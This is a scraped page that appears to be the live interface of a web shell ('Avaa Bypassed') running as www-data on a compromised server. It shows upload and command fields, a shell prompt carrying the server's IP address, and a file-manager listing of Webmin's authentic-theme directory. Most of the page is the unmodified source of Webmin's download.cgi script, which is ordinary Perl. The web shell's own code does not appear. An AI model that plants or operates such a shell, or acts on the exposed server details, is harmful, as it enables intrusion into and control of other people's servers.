[ Avaa Bypassed ]

Upload:

Command:

www-data@3.144.254.237: ~ $ 
#!/usr/bin/perl

#
# Authentic Theme (https://github.com/authentic-theme/authentic-theme)
# Copyright Ilia Rostovtsev <ilia@virtualmin.com>
# Licensed under MIT (https://github.com/authentic-theme/authentic-theme/blob/master/LICENSE)
#

use strict;

our (%in, $cwd, @allowed_paths);

do($ENV{'THEME_ROOT'} . "/extensions/file-manager/file-manager-lib.pl");

my $command;
my $has_zip    = has_command('zip');
my $has_tar    = has_command('tar');
my $do_zip     = ($in{'do_zip'} eq '1'                             ? 1     : 0);
my $extension  = (($has_zip && $do_zip && !test_all_items_query()) ? "zip" : "tar.gz");
my $filename   = $in{'filename'};
my $target_dir = tempname("$filename");
my $target     = "$target_dir/$filename.$extension";

if ($in{'cancel'} eq '1') {
    unlink_file($target_dir);
} elsif ($in{'download'} eq '2') {
    my $file  = &resolve_links(&simplify_path("$cwd/$filename"));
    my $error = 1;
    for my $allowed_path (@allowed_paths) {
        if (&is_under_directory($allowed_path, $file)) {
            $error = 0;
        }
    }
    $error && &print_error(&text('notallowed', &html_escape($file), &html_escape(join(" , ", @allowed_paths))));
    my $size = -s "$file";
    (my $name, my $dir, my $ext) = fileparse($file, qr/\.[^.]*/);
    print "Content-Type: application/x-download\n";
    print "Content-Disposition: attachment; filename=\"$name$ext\"\n";
    print "Content-Length: $size\n\n";
    open(FILE, "< $file") or die "can't open $file: $!";
    binmode FILE;
    local $/ = \&get_buffer_size_binary();

    while (<FILE>) {
        print $_;
    }
    close FILE;
} elsif ($in{'download'} eq '1') {
    my $file = simplify_path($target);
    if (-e $file) {
        my $size = -s "$target";
        print "Content-Type: application/x-download\n";
        print "Content-Disposition: attachment; filename=\"$filename.$extension\"\n";
        print "Content-Length: $size\n\n";
        open(FILE, "< $file") or die "can't open $file: $!";
        binmode FILE;
        local $/ = \&get_buffer_size_binary();

        while (<FILE>) {
            print $_;
        }
        close FILE;
        unlink_file($target_dir);
    } else {
        print_error(text('theme_download_error', &html_escape(join(" , ", @allowed_paths))));
    }
} else {
    mkdir($target_dir, 0755);
    my @entries_list = get_entries_list();
    if ($has_zip && $do_zip && !test_all_items_query()) {
        $command = "cd " . quotemeta($cwd) . " && " . quotemeta($has_zip || 'zip') . " -r " . quotemeta($target);

        # Do extra check because zip actually resolves links by default
        foreach my $name (@entries_list) {
            my $ffile = &resolve_links(&simplify_path("$cwd/$name"));
            my $error = 1;
            for my $allowed_path (@allowed_paths) {
                if (&is_under_directory($allowed_path, $ffile)) {
                    $error = 0;
                }
            }
            if (-e $ffile && !$error) {
                $command .= " " . quotemeta($name);
            }
        }
    } else {
        my $list          = transname();
        my $gnu_tar_param = get_tar_verbatim();

        # No need to resolve links and do extra check
        # because tar by default doesn't resolve links
        open my $fh, ">", $list or die $!;
        print $fh "$_\n" for @entries_list;
        close $fh;
        $command =
          "" .
          quotemeta($has_tar || 'tar') . " czf " .
          quotemeta($target) . " -C " .
          quotemeta($cwd) .
          "$gnu_tar_param -T " .
          $list;
    }
    system_logged($command);
}
head();

Filemanager

DIR : / usr/ share/ webmin/ authentic-theme/ extensions/ file-manager/
Name Type Size Permission Actions
acls.cgi File 2.29 KB 0755
bookmark.cgi File 948 B 0755
chattr.cgi File 1.14 KB 0755
chcon.cgi File 1.05 KB 0755
chmod.cgi File 3.22 KB 0755
chown.cgi File 1.5 KB 0755
compress.cgi File 3.86 KB 0755
copy.cgi File 613 B 0755
create_file.cgi File 1.4 KB 0755
create_folder.cgi File 1.39 KB 0755
create_symlink.cgi File 1.25 KB 0755
cut.cgi File 612 B 0755
delete.cgi File 3.13 KB 0755
download.cgi File 3.52 KB 0755
extract.cgi File 6.88 KB 0755
fetcher.cgi File 1.28 KB 0755
file-manager-lib.pl File 46.28 KB 0644
file-manager-reinit.min.js File 1.61 KB 0644
file-manager-reinit.min.js.gz File 807 B 0644
file-manager.min.js File 232.28 KB 0644
file-manager.min.js.gz File 49.29 KB 0644
gpg.cgi File 3.87 KB 0755
http_download.cgi File 1.54 KB 0755
list-images.cgi File 7.5 KB 0755
list.cgi File 340 B 0755
paste.cgi File 1.9 KB 0755
purge_trash.cgi File 1.45 KB 0755
rename.cgi File 1.44 KB 0755
search.cgi File 340 B 0755
tree.cgi File 605 B 0755

© 2025 Coded By Avaa Code.